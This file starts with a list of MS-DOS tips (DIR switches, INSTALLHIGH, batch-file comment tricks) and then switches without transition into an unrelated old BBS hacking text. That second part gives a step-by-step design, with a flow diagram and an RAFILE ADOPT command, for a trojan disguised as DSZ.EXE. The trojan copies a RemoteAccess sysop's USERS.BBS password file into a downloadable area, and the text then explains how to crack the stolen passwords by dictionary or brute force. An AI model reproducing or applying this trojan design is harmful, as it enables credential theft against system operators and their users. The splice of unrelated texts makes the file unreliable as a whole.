With DOS 5.0, it displayed a test file with H and A, but would not display IO.SYS or MSDOS.SYS with S, H and R.  This isn't surprising actually, since S alone (without H) will prevent inclusion of a file in a normal DIR.

Not tested with DOS 4.x.  Not supported by JP Software's 4DOS.

===========================================================================
 COPY. A:
 --------

The use of a period IMMEDIATELY after some DOS statements will work just like *.*

     Examples:  DEL.      (erase all files in current directory)
                COPY. A:  (copy all files in current directory to A:)

There may be more statements with which it works.

This is actually a documented although obscure feature, though the ability to use the period with COPY is not documented.  What is documented is the fact that "." and ".." can be used to represent the current and parent directories respectively, and these will work with many applications which can handle directory names as arguments.  In this case the "." could also be viewed as a replacement for "*.*"

===========================================================================
 DOS?=HIGH
 ---------

DOS?=HIGH in CONFIG.SYS with DOS 6.0 will prompt you whether to load the DOS kernel high (into the HMA) or not.

===========================================================================
 INSTALLHIGH
 -----------

In DOS 6.0, there is an undocumented CONFIG.SYS command called INSTALLHIGH= which works just like INSTALL= but loads the TSR high (into upper memory).

The only drawback to this is that MemMaker will not touch INSTALLHIGH lines during the optimizing process.  It just takes it as it is currently.  But then again, INSTALL= is ignored too.  All in all, INSTALL and INSTALLHIGH really are commands to set up manually by the user, and are not really recommended for normal use.  Load TSRs at the beginning of AUTOEXEC.BAT (and using LOADHIGH if desired).

       Example:

       DOS=HIGH,UMB
       DEVICE=C:\DOS\HIMEM.SYS
       DEVICE=C:\DOS\EMM386.EXE NOEMS
       INSTALLHIGH=C:\DOS\SHARE.EXE

===========================================================================
 Using : for batch file comments
 -------------------------------

DOS uses a leading : to indicate a label in a batch file.  If the next character following the : is a space or other non-alphanumeric character, then DOS will decide it's an invalid label and skip to the next line, performing no further action.  Faster batch file processing is achieved using this method for comments instead of REM commands.

===========================================================================
 REM in lines with pipes or redirection
 --------------------------------------

For example:  REM echo y | del *.*

Problems are encountered when trying to REM out an "echo y | del *.*" line in a batch file.  The problem appears to only occur if there is a pipe or redirection in the REMed out line, which shows that DOS first reads the entire line and processes pipes and redirections first, and then goes back to find out what to do with them in the line.  It's actually doing what it thinks you've told it:  Piping the output of REM to DEL.  Since REM has no output, DEL hangs, waiting for the answer to its question.
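The two batch-file points above (colon comments, and why REM cannot safely hide a piped line) side by side, as an added illustration that is not from the original tips file. The label names and the CONFIG.SYS check are made up for the demonstration; the piped DEL line is the one quoted above and is jumped over so it never runs:

```batch
@echo off
:: Colon comments: a leading ':' followed by a character that cannot start a
:: label makes DOS treat the line as an invalid label and skip it without
:: running anything, which is why this is faster than REM.
:: (Added illustration, not from the original tips file.)
: this line is skipped too, because the space after the colon is not a label
echo Processing started

REM A REM with no pipe or redirection is harmless.
REM But "REM echo y | del *.*" would NOT be harmless: the pipe is set up
REM before REM is evaluated, DEL is started and then waits on an empty pipe.

:: To neutralise a piped or redirected line, jump over it instead of REMing it:
goto skipdel
echo y | del *.*
:skipdel

:: Real labels still work as jump targets (label names are made up here):
if exist C:\CONFIG.SYS goto found
echo CONFIG.SYS not found
goto end
:found
echo CONFIG.SYS found
:end
echo Done
```

The GOTO form is the safe way to park a line that contains a pipe or redirection, because the batch interpreter never hands the skipped line to the command parser at all.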

===========================================================================
 Delimiter character
 -------------------

Prior to DOS 5.0, there was an undocumented DOS function that would allow you to set the DOS option delimiter character to something else, like a dash (-).  Once you did this, you could use either \ or / in PATH specifications.

DOS 5.0 removed the function to set the option delimiter, but retained the function to query what it currently is.

(Unfortunately, no further details were provided in this file, so not sure if the delimiter character can still be changed somehow.)

(The REAL way to hack RemoteAccess)

Well dewdz, ya seen the file text about hacking RemoteAccess and you wanna
crack that H/P or warez RA board for mega ratios?  Get Real!


RA *CAN* be hacked but only in the same way as any other BBS sox...  no
sysop reading that file has shat themselves .. here's why not:

Basically the technique outlined involved you writing a trojan and
disguising it as some program the sysop is really gagging for in the hope
is he'll run it on his system.  Wot it'll really do is copy his USER.BBS
onto the filebase so you can call back later and d/l it... neat idea, and
one that in *theory* will work with most BBS sox (most are EVEN easier coz
they don't encrypt the users file like RA) but their execution of it sucks!

Firstly, their compiled batch file relied on the sysop running RA off their
C: drive from the directory \RA...  Yeah, maybe some lame PD board they
hang out on is like that but most sysops I know run multiple drives and
many have more complex directory structures...       Lame Hacker 0 - Sysop 1

Okay... letz assume they got on some lame fucking board and the users file
*is* C:\RA\USERS.BBS - next step is to copy the file into the filebase and
make it d/lable.  How do they do that? (patronising Dez Lymon voice) <g>.

Their idea was to copy the file into D:\FILES\UPLOAD ..  Yeah sure guyz...
EVERY board uses the D: drive for the filebase and happen to have a file
area in \FILES\UPLOAD - NOT!!!!!!                    Lame Hacker 0 - Sysop 2

Right, so they got better odds than winning the national fucking lottery and
all the above worked (yeah man, we're dreamin' but let's give 'em a chance).
What next?  The file has to be d/lable...  you found a sysop that makes
UNCHECKED & UNSCANNED files available for download?  Fuck off!  Get a life!
                                                     Lame Hacker 0 - Sysop 3

So...  okay....  we got a sysop that's so fucking lame he doesn't deserve
to breathe the same air as the rest of the human race and uses all the
above paths and makes unchecked uploads d/lable.  RA by default won't allow
files to be d/led UNLESS they're in the file database.  Unless the USERS.BBS
destination ALREADY EXISTED in that area and was previously in the area
database there's NO WAY you can d/l it.

The way they "solved" this was to add an entry to FILES.BBS in the file
directory.  Nice one... EXCEPT RA DOESN'T USE FILES.BBS AS ITS FILE
DATABASE.   Unless you happen to be lucky enough that the sysop does an
import from FILES.BBS to the REAL file database before checking out your
planted file (most RA sysops only import from FILES.BBS when adding CDROMs)
the addition of this entry will do FUCK ALL!         Lame Hacker 0 - Sysop 4
                                                     
To quote from the author "This is a generic program and you will have to
tailor it so it will meet your needs." - yeah man, fucking rethink, redesign
and rewrite it more like!

Oh yeah... EVEN IF YOU DO get a copy of the USER.BBS file downloaded THE
PASSWORDS ARE ENCRYPTED!!!                       Lame Hacker :(  -  Sysop:-)


So how can U hack RA?  Well, the idea was okay but, like hacking any system,
you gotta KNOW the system ya gonna hack b4 U stand a chance.

Most sysops will use the DOS environment variable RA set to the RA system
directory so that external doors can find the system files...  that's very
helpful of the sysop, to show us where we can find his config files. <g>

In the RA system directory should be the file CONFIG.RA.  You might want to
include a check for this file within your program and possibly do a disk
and directory scan for the file if RA isn't defined or is set incorrectly.

I'm not *entirely* sure about other versions of RA, but in the current
release (2.02) the CONFIG.RA offset &h3E4 is where the name of the mail
directory starts.  This is the path where USERS.BBS will be found.

Next you need to know for SURE the name of a directory which stores the
files for a filearea from which you are able to download.

I suggest you do this in one of three ways:

1)  Interrogate the file FILES.RA in the RA system directory which contains
    the filebase area configs.  You *could* just search the directory for a
    valid path but you wouldn't know if you had d/l access to the area.

2)  If you want to be a bit more clever you could interpret the file and
    find out the minimum security level required to d/l from each area and
    dump your copy of USERS.BBS in the area with the lowest access level,
    pretty much guaranteeing that you'll be able to get to the file.  This
    doesn't take security flags into account so there's still a SLIM
    possibility you won't be able to d/l the file unless you also write flag
    testing into your program.

3)  My favourite technique is to have the program read a small config file
    which is uploaded with your archive.  This file just contains the name
    of a file you KNOW you have d/l access from.  You can then either do a
    global search for that filename or, preferably (coz it's faster) read
    FILES.RA for the paths used by the filebase and search those.

So now you have the location of the USERS.BBS and the destination directory
you simply need to copy the file.  However, even though the file is sitting
in a filebase directory it STILL isn't available for d/l... why?  Because
it's not in the filearea database.

You could get clever and find and amend the filearea database files directly if you
get the fileareas path from CONFIG.RA (offset &hC12) and write to the files
HDR\FBD#####.HDR (header) IDX\FDB#####.IDX (index) and, if you want to add
a description, TXT\FBD#####.TXT, where ##### is the RA file area number.

There *is* an easier way.  Shell out to DOS and execute the RAFILE utility
from the RA program path, passing the arguments "ADOPT filename #####".

E.g. the BASIC command would be:

             SHELL "RAFILE ADOPT "+filename$+STR$(areanum)

Where filename$ contains the name of your USERS.BBS copy and areanum is the
RA filearea number.  If your filename was USERTEST.ZIP and you'd copied it
to the directory used for RA file area 10 you'd be executing:

             RAFILE ADOPT USERTEST.ZIP 10

This will "adopt" the file, adding it to the RA file database, making it
available for d/l (assuming you have the appropriate rights to the area).

All you need to do now is to package this trojan file to entice the sysop
into running it...  In the LAME method for hacking RA the author used DSZ
as an example.  That was about the most realistic part of the file and the
only bit worth leaching!  <g>


Your archive:
                DSZ.EXE (your program)
                DSZ.DAT (the *real* DSZ.EXE)
                DSZ.CFG (small file containing the name of a *known*
                         d/lable file - preferably encrypted)
                + any other files that normally come with DSZ


               
Flow diagram for DSZ.EXE trojan:

                            _______ 
                           /       \
                          |  Start  |
                           \_______/
                               |
                               |
                      +--------+--------+
                      |Read environment |
                      |   variable RA   |
                      +--------+--------+
                               |
                               |
                              / \
                            /     \
                          /CONFIG.RA\          +---------------------+
                        /  exist in   \___>____| Scan drives & paths |
                        \  that path  / No     | search for the file |
                          \    ?    /          +----------+----------+
                            \     /                       |
                              \ /                         |
                           Yes |                          |
                               +------------<-------------+
                               |
                      +--------+--------+
                      | Read CONFIG.RA  |
                      | to get location |
                      |   of USERS.BBS  |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Read DSZ.CFG to |
                      | get a filename  |
                      +--------+--------+
                               |_____________<____________
                               |                          |
                      +--------+--------+                 |
                      | Read FILES.RA to|                 |
                      | get name of the |                 |
                      |  next filearea  |                 |
                      +--------+--------+                 |
                               |                          |
                               |                          |
                              / \                         |
                            /     \                       |
                          /does area\                     |
                        / contain the \________>__________|
                        \     file    / No
                          \    ?    /
                            \     /                      
                              \ /                        
                           Yes |                         
                               |
                      +--------+--------+
                      | Copy USERS.BBS  |
                      | to the filearea |
                      |    directory    |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Run RAFILE with |
                      | ADOPT to update |
                      |   RA database   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Delete DSZ.EXE  |
                      |   and DSZ.CFG   |
                      +--------+--------+
                               |
                               |
                      +--------+--------+
                      | Rename DSZ.DAT  |
                      |   to DSZ.EXE    |
                      +--------+--------+
                               |
                            ___|___ 
                           /       \
                          |  Stop!  |
                           \_______/
                             
Once you've uploaded the file, preferably using a pseudonym, post the sysop
a message telling him how c00l your upload is.  Wait a day or so and dial
back.  Do a filename search using the name you decided to use for your copy
of USERS.BBS and d/l it. 

The next step, now you have the USERS.BBS file is to crack the passwords. 
I only know of ONE crack program out there which has the RA password
encryption algorithm, a program based on the popular Unix CRACKERJACK
program called RA-CRACK.  This simply takes a given word, encrypts it, and
compares it to the USERS.BBS file to find a user with a matching password.

RA-CRACK takes its source words from a text file so it would be possible
to either:

 a)  Use a TXT dictionary file as the source.  All passwords that are
     normal words will be found.  This method will usually find about 90%
     of the user passwords.

 b)  Write a "brute force" cracker using a small routine that "counts"
     through valid ASCII character combinations from "!" (ASCII 33) up to
     a string containing 25 (max length of a RA password) null characters
     (ASCII 255), passing these via a text file to RA-CRACK.  This SHOULD
     be _100%_ successful, but SLOW!